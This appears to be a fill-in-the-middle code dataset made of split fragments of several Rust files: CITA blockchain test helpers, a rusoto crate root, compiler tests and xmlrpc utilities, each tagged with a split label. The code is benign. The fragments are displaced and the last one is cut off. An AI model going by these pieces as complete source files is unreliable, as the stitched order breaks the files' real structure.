compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
Ok(())
}
|
identifier_body
|
|
helpers.rs
|
// Copyrighttape Technologies LLC.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
extern crate rustc_serialize;
extern crate tempdir;
use std::env;
use std::fs::File;
use std::io::Read;
use std::io::Write;
use std::path::Path;
use std::process::Command;
use std::sync::Arc;
use std::time::UNIX_EPOCH;
use self::rustc_serialize::hex::FromHex;
use self::tempdir::TempDir;
use crate::libexecutor::block::{BlockBody, ClosedBlock, OpenBlock};
use crate::libexecutor::command;
use crate::libexecutor::executor::Executor;
use crate::types::header::OpenHeader;
use crate::types::transaction::SignedTransaction;
use cita_crypto::PrivKey;
use cita_types::traits::LowerHex;
use cita_types::{Address, U256};
use cita_vm::{state::MemoryDB, state::State};
use crossbeam_channel::{Receiver, Sender};
use libproto::blockchain;
use util::AsMillis;
const SCRIPTS_DIR: &str = "../../scripts";
pub fn get_temp_state() -> State<MemoryDB> {
let db = Arc::new(MemoryDB::new(false));
State::new(db).unwrap()
}
pub fn solc(name: &str, source: &str) -> (Vec<u8>, Vec<u8>) {
// input and output of solc command
let output_dir = TempDir::new("solc_output").unwrap().into_path();
let contract_file = output_dir.join("contract.sol");
let deploy_code_file = output_dir.join([name, ".bin"].join(""));
let runtime_code_file = output_dir.join([name, ".bin-runtime"].join(""));
// prepare contract file
let mut file = File::create(contract_file.clone()).unwrap();
let mut content = String::new();
file.write_all(source.as_ref()).expect("failed to write");
// execute solc command
Command::new("solc")
.arg(contract_file.clone())
.arg("--bin")
.arg("--bin-runtime")
.arg("-o")
.arg(output_dir)
.output()
.expect("failed to execute solc");
// read deploy code
File::open(deploy_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let deploy_code = content.as_str().from_hex().unwrap();
// read runtime code
let mut content = String::new();
File::open(runtime_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let runtime_code = content.from_hex().unwrap();
(deploy_code, runtime_code)
}
pub fn init_executor() -> Executor {
let (_fsm_req_sender, fsm_req_receiver) = crossbeam_channel::unbounded();
let (fsm_resp_sender, _fsm_resp_receiver) = crossbeam_channel::unbounded();
let (_command_req_sender, command_req_receiver) = crossbeam_channel::bounded(0);
let (command_resp_sender, _command_resp_receiver) = crossbeam_channel::bounded(0);
init_executor2(
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
)
}
pub fn init_executor2(
fsm_req_receiver: Receiver<OpenBlock>,
fsm_resp_sender: Sender<ClosedBlock>,
command_req_receiver: Receiver<command::Command>,
command_resp_sender: Sender<command::CommandResp>,
) -> Executor {
// FIXME temp dir should be removed automatically, but at present it is not
let tempdir = TempDir::new("init_executor").unwrap().into_path();
let genesis_path = Path::new(SCRIPTS_DIR).join("config_tool/genesis/genesis.json");
let mut data_path = tempdir.clone();
data_path.push("data");
env::set_var("DATA_PATH", data_path);
let executor = Executor::init(
genesis_path.to_str().unwrap(),
tempdir.to_str().unwrap().to_string(),
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
false,
);
executor
}
pub fn create_block(
executor: &Executor,
to: Address,
data: &Vec<u8>,
nonce: (u32, u32),
privkey: &PrivKey,
) -> OpenBlock
|
tx.set_valid_until_block(100);
tx.set_quota(1844674);
let stx = tx.sign(*privkey);
let new_tx = SignedTransaction::create(&stx).unwrap();
txs.push(new_tx);
}
body.set_transactions(txs);
block.set_body(body);
block
}
pub fn generate_contract() -> Vec<u8> {
let source = r#"
pragma solidity ^0.4.8;
contract ConstructSol {
uint a;
event LogCreate(address contractAddr);
event A(uint);
function ConstructSol(){
LogCreate(this);
}
function set(uint _a) {
a = _a;
A(a);
}
function get() returns (uint) {
return a;
}
}
"#;
let (data, _) = solc("ConstructSol", source);
data
}
pub fn generate_block_header() -> OpenHeader {
OpenHeader::default()
}
pub fn generate_block_body() -> BlockBody {
let mut stx = SignedTransaction::default();
stx.data = vec![1; 200];
let transactions = vec![stx; 200];
BlockBody { transactions }
}
pub fn generate_default_block() -> OpenBlock {
let block_body = generate_block_body();
let block_header = generate_block_header();
OpenBlock {
body: block_body,
header: block_header,
}
}
|
{
let mut block = OpenBlock::default();
block.set_parent_hash(executor.get_current_hash());
block.set_timestamp(AsMillis::as_millis(&UNIX_EPOCH.elapsed().unwrap()));
block.set_number(executor.get_current_height() + 1);
// header.proof= ?;
let mut body = BlockBody::default();
let mut txs = Vec::new();
for i in nonce.0..nonce.1 {
let mut tx = blockchain::Transaction::new();
if to == Address::from(0) {
tx.set_to(String::from(""));
} else {
tx.set_to(to.lower_hex());
}
tx.set_nonce(U256::from(i).lower_hex());
tx.set_data(data.clone());
|
identifier_body
|
helpers.rs
|
// Copyrighttape Technologies LLC.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
extern crate rustc_serialize;
extern crate tempdir;
use std::env;
use std::fs::File;
use std::io::Read;
use std::io::Write;
use std::path::Path;
use std::process::Command;
use std::sync::Arc;
use std::time::UNIX_EPOCH;
use self::rustc_serialize::hex::FromHex;
use self::tempdir::TempDir;
use crate::libexecutor::block::{BlockBody, ClosedBlock, OpenBlock};
use crate::libexecutor::command;
use crate::libexecutor::executor::Executor;
use crate::types::header::OpenHeader;
use crate::types::transaction::SignedTransaction;
use cita_crypto::PrivKey;
use cita_types::traits::LowerHex;
use cita_types::{Address, U256};
use cita_vm::{state::MemoryDB, state::State};
use crossbeam_channel::{Receiver, Sender};
use libproto::blockchain;
use util::AsMillis;
const SCRIPTS_DIR: &str = "../../scripts";
pub fn get_temp_state() -> State<MemoryDB> {
let db = Arc::new(MemoryDB::new(false));
State::new(db).unwrap()
}
pub fn solc(name: &str, source: &str) -> (Vec<u8>, Vec<u8>) {
// input and output of solc command
let output_dir = TempDir::new("solc_output").unwrap().into_path();
let contract_file = output_dir.join("contract.sol");
let deploy_code_file = output_dir.join([name, ".bin"].join(""));
let runtime_code_file = output_dir.join([name, ".bin-runtime"].join(""));
// prepare contract file
let mut file = File::create(contract_file.clone()).unwrap();
let mut content = String::new();
file.write_all(source.as_ref()).expect("failed to write");
// execute solc command
Command::new("solc")
.arg(contract_file.clone())
.arg("--bin")
.arg("--bin-runtime")
.arg("-o")
.arg(output_dir)
.output()
.expect("failed to execute solc");
|
.read_to_string(&mut content)
.expect("failed to read binary");
let deploy_code = content.as_str().from_hex().unwrap();
// read runtime code
let mut content = String::new();
File::open(runtime_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let runtime_code = content.from_hex().unwrap();
(deploy_code, runtime_code)
}
pub fn init_executor() -> Executor {
let (_fsm_req_sender, fsm_req_receiver) = crossbeam_channel::unbounded();
let (fsm_resp_sender, _fsm_resp_receiver) = crossbeam_channel::unbounded();
let (_command_req_sender, command_req_receiver) = crossbeam_channel::bounded(0);
let (command_resp_sender, _command_resp_receiver) = crossbeam_channel::bounded(0);
init_executor2(
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
)
}
pub fn init_executor2(
fsm_req_receiver: Receiver<OpenBlock>,
fsm_resp_sender: Sender<ClosedBlock>,
command_req_receiver: Receiver<command::Command>,
command_resp_sender: Sender<command::CommandResp>,
) -> Executor {
// FIXME temp dir should be removed automatically, but at present it is not
let tempdir = TempDir::new("init_executor").unwrap().into_path();
let genesis_path = Path::new(SCRIPTS_DIR).join("config_tool/genesis/genesis.json");
let mut data_path = tempdir.clone();
data_path.push("data");
env::set_var("DATA_PATH", data_path);
let executor = Executor::init(
genesis_path.to_str().unwrap(),
tempdir.to_str().unwrap().to_string(),
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
false,
);
executor
}
pub fn create_block(
executor: &Executor,
to: Address,
data: &Vec<u8>,
nonce: (u32, u32),
privkey: &PrivKey,
) -> OpenBlock {
let mut block = OpenBlock::default();
block.set_parent_hash(executor.get_current_hash());
block.set_timestamp(AsMillis::as_millis(&UNIX_EPOCH.elapsed().unwrap()));
block.set_number(executor.get_current_height() + 1);
// header.proof=?;
let mut body = BlockBody::default();
let mut txs = Vec::new();
for i in nonce.0..nonce.1 {
let mut tx = blockchain::Transaction::new();
if to == Address::from(0) {
tx.set_to(String::from(""));
} else {
tx.set_to(to.lower_hex());
}
tx.set_nonce(U256::from(i).lower_hex());
tx.set_data(data.clone());
tx.set_valid_until_block(100);
tx.set_quota(1844674);
let stx = tx.sign(*privkey);
let new_tx = SignedTransaction::create(&stx).unwrap();
txs.push(new_tx);
}
body.set_transactions(txs);
block.set_body(body);
block
}
pub fn generate_contract() -> Vec<u8> {
let source = r#"
pragma solidity ^0.4.8;
contract ConstructSol {
uint a;
event LogCreate(address contractAddr);
event A(uint);
function ConstructSol(){
LogCreate(this);
}
function set(uint _a) {
a = _a;
A(a);
}
function get() returns (uint) {
return a;
}
}
"#;
let (data, _) = solc("ConstructSol", source);
data
}
pub fn generate_block_header() -> OpenHeader {
OpenHeader::default()
}
pub fn generate_block_body() -> BlockBody {
let mut stx = SignedTransaction::default();
stx.data = vec![1; 200];
let transactions = vec![stx; 200];
BlockBody { transactions }
}
pub fn generate_default_block() -> OpenBlock {
let block_body = generate_block_body();
let block_header = generate_block_header();
OpenBlock {
body: block_body,
header: block_header,
}
}
|
// read deploy code
File::open(deploy_code_file)
.expect("failed to open deploy code file!")
|
random_line_split
|
helpers.rs
|
// Copyrighttape Technologies LLC.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
extern crate rustc_serialize;
extern crate tempdir;
use std::env;
use std::fs::File;
use std::io::Read;
use std::io::Write;
use std::path::Path;
use std::process::Command;
use std::sync::Arc;
use std::time::UNIX_EPOCH;
use self::rustc_serialize::hex::FromHex;
use self::tempdir::TempDir;
use crate::libexecutor::block::{BlockBody, ClosedBlock, OpenBlock};
use crate::libexecutor::command;
use crate::libexecutor::executor::Executor;
use crate::types::header::OpenHeader;
use crate::types::transaction::SignedTransaction;
use cita_crypto::PrivKey;
use cita_types::traits::LowerHex;
use cita_types::{Address, U256};
use cita_vm::{state::MemoryDB, state::State};
use crossbeam_channel::{Receiver, Sender};
use libproto::blockchain;
use util::AsMillis;
const SCRIPTS_DIR: &str = "../../scripts";
pub fn get_temp_state() -> State<MemoryDB> {
let db = Arc::new(MemoryDB::new(false));
State::new(db).unwrap()
}
pub fn solc(name: &str, source: &str) -> (Vec<u8>, Vec<u8>) {
// input and output of solc command
let output_dir = TempDir::new("solc_output").unwrap().into_path();
let contract_file = output_dir.join("contract.sol");
let deploy_code_file = output_dir.join([name, ".bin"].join(""));
let runtime_code_file = output_dir.join([name, ".bin-runtime"].join(""));
// prepare contract file
let mut file = File::create(contract_file.clone()).unwrap();
let mut content = String::new();
file.write_all(source.as_ref()).expect("failed to write");
// execute solc command
Command::new("solc")
.arg(contract_file.clone())
.arg("--bin")
.arg("--bin-runtime")
.arg("-o")
.arg(output_dir)
.output()
.expect("failed to execute solc");
// read deploy code
File::open(deploy_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let deploy_code = content.as_str().from_hex().unwrap();
// read runtime code
let mut content = String::new();
File::open(runtime_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let runtime_code = content.from_hex().unwrap();
(deploy_code, runtime_code)
}
pub fn init_executor() -> Executor {
let (_fsm_req_sender, fsm_req_receiver) = crossbeam_channel::unbounded();
let (fsm_resp_sender, _fsm_resp_receiver) = crossbeam_channel::unbounded();
let (_command_req_sender, command_req_receiver) = crossbeam_channel::bounded(0);
let (command_resp_sender, _command_resp_receiver) = crossbeam_channel::bounded(0);
init_executor2(
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
)
}
pub fn init_executor2(
fsm_req_receiver: Receiver<OpenBlock>,
fsm_resp_sender: Sender<ClosedBlock>,
command_req_receiver: Receiver<command::Command>,
command_resp_sender: Sender<command::CommandResp>,
) -> Executor {
// FIXME temp dir should be removed automatically, but at present it is not
let tempdir = TempDir::new("init_executor").unwrap().into_path();
let genesis_path = Path::new(SCRIPTS_DIR).join("config_tool/genesis/genesis.json");
let mut data_path = tempdir.clone();
data_path.push("data");
env::set_var("DATA_PATH", data_path);
let executor = Executor::init(
genesis_path.to_str().unwrap(),
tempdir.to_str().unwrap().to_string(),
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
false,
);
executor
}
pub fn create_block(
executor: &Executor,
to: Address,
data: &Vec<u8>,
nonce: (u32, u32),
privkey: &PrivKey,
) -> OpenBlock {
let mut block = OpenBlock::default();
block.set_parent_hash(executor.get_current_hash());
block.set_timestamp(AsMillis::as_millis(&UNIX_EPOCH.elapsed().unwrap()));
block.set_number(executor.get_current_height() + 1);
// header.proof=?;
let mut body = BlockBody::default();
let mut txs = Vec::new();
for i in nonce.0..nonce.1 {
let mut tx = blockchain::Transaction::new();
if to == Address::from(0) {
tx.set_to(String::from(""));
} else
|
tx.set_nonce(U256::from(i).lower_hex());
tx.set_data(data.clone());
tx.set_valid_until_block(100);
tx.set_quota(1844674);
let stx = tx.sign(*privkey);
let new_tx = SignedTransaction::create(&stx).unwrap();
txs.push(new_tx);
}
body.set_transactions(txs);
block.set_body(body);
block
}
pub fn generate_contract() -> Vec<u8> {
let source = r#"
pragma solidity ^0.4.8;
contract ConstructSol {
uint a;
event LogCreate(address contractAddr);
event A(uint);
function ConstructSol(){
LogCreate(this);
}
function set(uint _a) {
a = _a;
A(a);
}
function get() returns (uint) {
return a;
}
}
"#;
let (data, _) = solc("ConstructSol", source);
data
}
pub fn generate_block_header() -> OpenHeader {
OpenHeader::default()
}
pub fn generate_block_body() -> BlockBody {
let mut stx = SignedTransaction::default();
stx.data = vec![1; 200];
let transactions = vec![stx; 200];
BlockBody { transactions }
}
pub fn generate_default_block() -> OpenBlock {
let block_body = generate_block_body();
let block_header = generate_block_header();
OpenBlock {
body: block_body,
header: block_header,
}
}
|
{
tx.set_to(to.lower_hex());
}
|
conditional_block
|
helpers.rs
|
// Copyrighttape Technologies LLC.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
extern crate rustc_serialize;
extern crate tempdir;
use std::env;
use std::fs::File;
use std::io::Read;
use std::io::Write;
use std::path::Path;
use std::process::Command;
use std::sync::Arc;
use std::time::UNIX_EPOCH;
use self::rustc_serialize::hex::FromHex;
use self::tempdir::TempDir;
use crate::libexecutor::block::{BlockBody, ClosedBlock, OpenBlock};
use crate::libexecutor::command;
use crate::libexecutor::executor::Executor;
use crate::types::header::OpenHeader;
use crate::types::transaction::SignedTransaction;
use cita_crypto::PrivKey;
use cita_types::traits::LowerHex;
use cita_types::{Address, U256};
use cita_vm::{state::MemoryDB, state::State};
use crossbeam_channel::{Receiver, Sender};
use libproto::blockchain;
use util::AsMillis;
const SCRIPTS_DIR: &str = "../../scripts";
pub fn get_temp_state() -> State<MemoryDB> {
let db = Arc::new(MemoryDB::new(false));
State::new(db).unwrap()
}
pub fn solc(name: &str, source: &str) -> (Vec<u8>, Vec<u8>) {
// input and output of solc command
let output_dir = TempDir::new("solc_output").unwrap().into_path();
let contract_file = output_dir.join("contract.sol");
let deploy_code_file = output_dir.join([name, ".bin"].join(""));
let runtime_code_file = output_dir.join([name, ".bin-runtime"].join(""));
// prepare contract file
let mut file = File::create(contract_file.clone()).unwrap();
let mut content = String::new();
file.write_all(source.as_ref()).expect("failed to write");
// execute solc command
Command::new("solc")
.arg(contract_file.clone())
.arg("--bin")
.arg("--bin-runtime")
.arg("-o")
.arg(output_dir)
.output()
.expect("failed to execute solc");
// read deploy code
File::open(deploy_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let deploy_code = content.as_str().from_hex().unwrap();
// read runtime code
let mut content = String::new();
File::open(runtime_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let runtime_code = content.from_hex().unwrap();
(deploy_code, runtime_code)
}
pub fn init_executor() -> Executor {
let (_fsm_req_sender, fsm_req_receiver) = crossbeam_channel::unbounded();
let (fsm_resp_sender, _fsm_resp_receiver) = crossbeam_channel::unbounded();
let (_command_req_sender, command_req_receiver) = crossbeam_channel::bounded(0);
let (command_resp_sender, _command_resp_receiver) = crossbeam_channel::bounded(0);
init_executor2(
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
)
}
pub fn
|
(
fsm_req_receiver: Receiver<OpenBlock>,
fsm_resp_sender: Sender<ClosedBlock>,
command_req_receiver: Receiver<command::Command>,
command_resp_sender: Sender<command::CommandResp>,
) -> Executor {
// FIXME temp dir should be removed automatically, but at present it is not
let tempdir = TempDir::new("init_executor").unwrap().into_path();
let genesis_path = Path::new(SCRIPTS_DIR).join("config_tool/genesis/genesis.json");
let mut data_path = tempdir.clone();
data_path.push("data");
env::set_var("DATA_PATH", data_path);
let executor = Executor::init(
genesis_path.to_str().unwrap(),
tempdir.to_str().unwrap().to_string(),
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
false,
);
executor
}
pub fn create_block(
executor: &Executor,
to: Address,
data: &Vec<u8>,
nonce: (u32, u32),
privkey: &PrivKey,
) -> OpenBlock {
let mut block = OpenBlock::default();
block.set_parent_hash(executor.get_current_hash());
block.set_timestamp(AsMillis::as_millis(&UNIX_EPOCH.elapsed().unwrap()));
block.set_number(executor.get_current_height() + 1);
// header.proof=?;
let mut body = BlockBody::default();
let mut txs = Vec::new();
for i in nonce.0..nonce.1 {
let mut tx = blockchain::Transaction::new();
if to == Address::from(0) {
tx.set_to(String::from(""));
} else {
tx.set_to(to.lower_hex());
}
tx.set_nonce(U256::from(i).lower_hex());
tx.set_data(data.clone());
tx.set_valid_until_block(100);
tx.set_quota(1844674);
let stx = tx.sign(*privkey);
let new_tx = SignedTransaction::create(&stx).unwrap();
txs.push(new_tx);
}
body.set_transactions(txs);
block.set_body(body);
block
}
pub fn generate_contract() -> Vec<u8> {
let source = r#"
pragma solidity ^0.4.8;
contract ConstructSol {
uint a;
event LogCreate(address contractAddr);
event A(uint);
function ConstructSol(){
LogCreate(this);
}
function set(uint _a) {
a = _a;
A(a);
}
function get() returns (uint) {
return a;
}
}
"#;
let (data, _) = solc("ConstructSol", source);
data
}
pub fn generate_block_header() -> OpenHeader {
OpenHeader::default()
}
pub fn generate_block_body() -> BlockBody {
let mut stx = SignedTransaction::default();
stx.data = vec![1; 200];
let transactions = vec![stx; 200];
BlockBody { transactions }
}
pub fn generate_default_block() -> OpenBlock {
let block_body = generate_block_body();
let block_header = generate_block_header();
OpenBlock {
body: block_body,
header: block_header,
}
}
|
init_executor2
|
identifier_name
|
lib.rs
|
// =================================================================
//
// * WARNING *
//
// This file is generated!
//
// Changes made to this file will be overwritten. If changes are
// required to the generated code, the service_crategen project
// must be updated to generate the changes.
//
// =================================================================
#![doc(
html_logo_url = "https://raw.githubusercontent.com/rusoto/rusoto/master/assets/logo-square.png"
)]
//! <p>Amazon Web Services Transfer Family is a fully managed service that enables the transfer of files over the File Transfer Protocol (FTP), File Transfer Protocol over SSL (FTPS), or Secure Shell (SSH) File Transfer Protocol (SFTP) directly into and out of Amazon Simple Storage Service (Amazon S3). Amazon Web Services helps you seamlessly migrate your file transfer workflows to Amazon Web Services Transfer Family by integrating with existing authentication systems, and providing DNS routing with Amazon Route 53 so nothing changes for your customers and partners, or their applications. With your data in Amazon S3, you can use it with Amazon Web Services services for processing, analytics, machine learning, and archiving. Getting started with Amazon Web Services Transfer Family is easy since there is no infrastructure to buy and set up.</p>
//!
//! If you're using the service, you're probably looking for [TransferClient](struct.TransferClient.html) and [Transfer](trait.Transfer.html).
|
mod generated;
pub use custom::*;
pub use generated::*;
|
mod custom;
|
random_line_split
|
issue-11552.rs
|
// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(unknown_features)]
#![feature(box_syntax)]
#[derive(Clone)]
enum
|
{
Atom(int),
Cell(Box<Noun>, Box<Noun>)
}
fn fas(n: &Noun) -> Noun
{
match n {
&Noun::Cell(box Noun::Atom(2), box Noun::Cell(ref a, _)) => (**a).clone(),
_ => panic!("Invalid fas pattern")
}
}
pub fn main() {
fas(&Noun::Cell(box Noun::Atom(2), box Noun::Cell(box Noun::Atom(2), box Noun::Atom(3))));
}
|
Noun
|
identifier_name
|
issue-11552.rs
|
// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(unknown_features)]
#![feature(box_syntax)]
|
Cell(Box<Noun>, Box<Noun>)
}
fn fas(n: &Noun) -> Noun
{
match n {
&Noun::Cell(box Noun::Atom(2), box Noun::Cell(ref a, _)) => (**a).clone(),
_ => panic!("Invalid fas pattern")
}
}
pub fn main() {
fas(&Noun::Cell(box Noun::Atom(2), box Noun::Cell(box Noun::Atom(2), box Noun::Atom(3))));
}
|
#[derive(Clone)]
enum Noun
{
Atom(int),
|
random_line_split
|
target-feature-multiple.rs
|
// assembly-output: emit-asm
// needs-llvm-components: x86
// revisions: TWOFLAGS SINGLEFLAG
// compile-flags: --target=x86_64-unknown-linux-gnu
// [TWOFLAGS] compile-flags: -C target-feature=+rdrnd -C target-feature=+rdseed
// [SINGLEFLAG] compile-flags: -C target-feature=+rdrnd,+rdseed
// Target features set via flags aren't necessarily reflected in the IR, so the only way to test
// them is to build code that requires the features to be enabled to work.
//
// In this particular test if `rdrnd,rdseed` somehow didn't make it to LLVM, the instruction
// selection should crash.
//
// > LLVM ERROR: Cannot select: 0x7f00f400c010: i32,i32,ch = X86ISD::RDSEED 0x7f00f400bfa8:2
// > In function: foo
//
|
#![no_core]
#[lang = "sized"]
trait Sized {}
#[lang = "copy"]
trait Copy {}
// Use of these requires target features to be enabled
extern "unadjusted" {
#[link_name = "llvm.x86.rdrand.32"]
fn x86_rdrand32_step() -> (u32, i32);
#[link_name = "llvm.x86.rdseed.32"]
fn x86_rdseed32_step() -> (u32, i32);
}
#[no_mangle]
pub unsafe fn foo() -> (u32, u32) {
// CHECK-LABEL: foo:
// CHECK: rdrand
// CHECK: rdseed
(x86_rdrand32_step().0, x86_rdseed32_step().0)
}
|
// See also src/test/codegen/target-feature-overrides.rs
#![feature(no_core, lang_items, link_llvm_intrinsics, abi_unadjusted)]
#![crate_type = "lib"]
|
random_line_split
|
target-feature-multiple.rs
|
// assembly-output: emit-asm
// needs-llvm-components: x86
// revisions: TWOFLAGS SINGLEFLAG
// compile-flags: --target=x86_64-unknown-linux-gnu
// [TWOFLAGS] compile-flags: -C target-feature=+rdrnd -C target-feature=+rdseed
// [SINGLEFLAG] compile-flags: -C target-feature=+rdrnd,+rdseed
// Target features set via flags aren't necessarily reflected in the IR, so the only way to test
// them is to build code that requires the features to be enabled to work.
//
// In this particular test if `rdrnd,rdseed` somehow didn't make it to LLVM, the instruction
// selection should crash.
//
// > LLVM ERROR: Cannot select: 0x7f00f400c010: i32,i32,ch = X86ISD::RDSEED 0x7f00f400bfa8:2
// > In function: foo
//
// See also src/test/codegen/target-feature-overrides.rs
#![feature(no_core, lang_items, link_llvm_intrinsics, abi_unadjusted)]
#![crate_type = "lib"]
#![no_core]
#[lang = "sized"]
trait Sized {}
#[lang = "copy"]
trait Copy {}
// Use of these requires target features to be enabled
extern "unadjusted" {
#[link_name = "llvm.x86.rdrand.32"]
fn x86_rdrand32_step() -> (u32, i32);
#[link_name = "llvm.x86.rdseed.32"]
fn x86_rdseed32_step() -> (u32, i32);
}
#[no_mangle]
pub unsafe fn foo() -> (u32, u32)
|
{
// CHECK-LABEL: foo:
// CHECK: rdrand
// CHECK: rdseed
(x86_rdrand32_step().0, x86_rdseed32_step().0)
}
|
identifier_body
|
|
target-feature-multiple.rs
|
// assembly-output: emit-asm
// needs-llvm-components: x86
// revisions: TWOFLAGS SINGLEFLAG
// compile-flags: --target=x86_64-unknown-linux-gnu
// [TWOFLAGS] compile-flags: -C target-feature=+rdrnd -C target-feature=+rdseed
// [SINGLEFLAG] compile-flags: -C target-feature=+rdrnd,+rdseed
// Target features set via flags aren't necessarily reflected in the IR, so the only way to test
// them is to build code that requires the features to be enabled to work.
//
// In this particular test if `rdrnd,rdseed` somehow didn't make it to LLVM, the instruction
// selection should crash.
//
// > LLVM ERROR: Cannot select: 0x7f00f400c010: i32,i32,ch = X86ISD::RDSEED 0x7f00f400bfa8:2
// > In function: foo
//
// See also src/test/codegen/target-feature-overrides.rs
#![feature(no_core, lang_items, link_llvm_intrinsics, abi_unadjusted)]
#![crate_type = "lib"]
#![no_core]
#[lang = "sized"]
trait Sized {}
#[lang = "copy"]
trait Copy {}
// Use of these requires target features to be enabled
extern "unadjusted" {
#[link_name = "llvm.x86.rdrand.32"]
fn x86_rdrand32_step() -> (u32, i32);
#[link_name = "llvm.x86.rdseed.32"]
fn x86_rdseed32_step() -> (u32, i32);
}
#[no_mangle]
pub unsafe fn
|
() -> (u32, u32) {
// CHECK-LABEL: foo:
// CHECK: rdrand
// CHECK: rdseed
(x86_rdrand32_step().0, x86_rdseed32_step().0)
}
|
foo
|
identifier_name
|
utils.rs
|
use iso8601::{Date, DateTime, Time};
use xml::escape::escape_str_pcdata;
use std::borrow::Cow;
use std::fmt::Write;
/// Escape a string for use as XML characters.
///
/// The resulting string is *not* suitable for use in XML attributes, but XML-RPC doesn't use those.
pub fn
|
(s: &str) -> Cow<'_, str> {
escape_str_pcdata(s)
}
/// Formats a `DateTime` for use in XML-RPC.
///
/// Note that XML-RPC is extremely underspecified when it comes to datetime values. Apparently,
/// some clients [don't even support timezone information][wp-bug] (we do). For maximum
/// interoperability, this will omit fractional time and time zone if not specified.
///
/// [wp-bug]: https://core.trac.wordpress.org/ticket/1633#comment:4
pub fn format_datetime(date_time: &DateTime) -> String {
let Time {
hour,
minute,
second,
millisecond,
tz_offset_hours,
tz_offset_minutes,
} = date_time.time;
match date_time.date {
Date::YMD { year, month, day } => {
// The base format is based directly on the example in the spec and should always work:
let mut string = format!(
"{:04}{:02}{:02}T{:02}:{:02}:{:02}",
year, month, day, hour, minute, second
);
// Only append milliseconds when they're >0
if millisecond > 0 {
write!(string, ".{:.3}", millisecond).unwrap();
}
// Only append time zone info if the offset is specified and not 00:00
if tz_offset_hours!= 0 || tz_offset_minutes!= 0 {
write!(
string,
"{:+03}:{:02}",
tz_offset_hours,
tz_offset_minutes.abs()
)
.unwrap();
}
string
}
// Other format are just not supported at all:
Date::Week {.. } | Date::Ordinal {.. } => unimplemented!(),
}
}
#[cfg(test)]
mod tests {
use super::*;
use iso8601;
#[test]
fn formats_datetimes() {
let date_time = iso8601::datetime("2016-05-02T06:01:05-0830").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05-08:30");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction
let date_time = iso8601::datetime("20160502T06:01:05.400").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction + time zone
let date_time = iso8601::datetime("20160502T06:01:05.400+01:02").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400+01:02");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
}
}
|
escape_xml
|
identifier_name
|
utils.rs
|
use iso8601::{Date, DateTime, Time};
use xml::escape::escape_str_pcdata;
use std::borrow::Cow;
use std::fmt::Write;
/// Escape a string for use as XML characters.
///
/// The resulting string is *not* suitable for use in XML attributes, but XML-RPC doesn't use those.
pub fn escape_xml(s: &str) -> Cow<'_, str> {
escape_str_pcdata(s)
}
/// Formats a `DateTime` for use in XML-RPC.
///
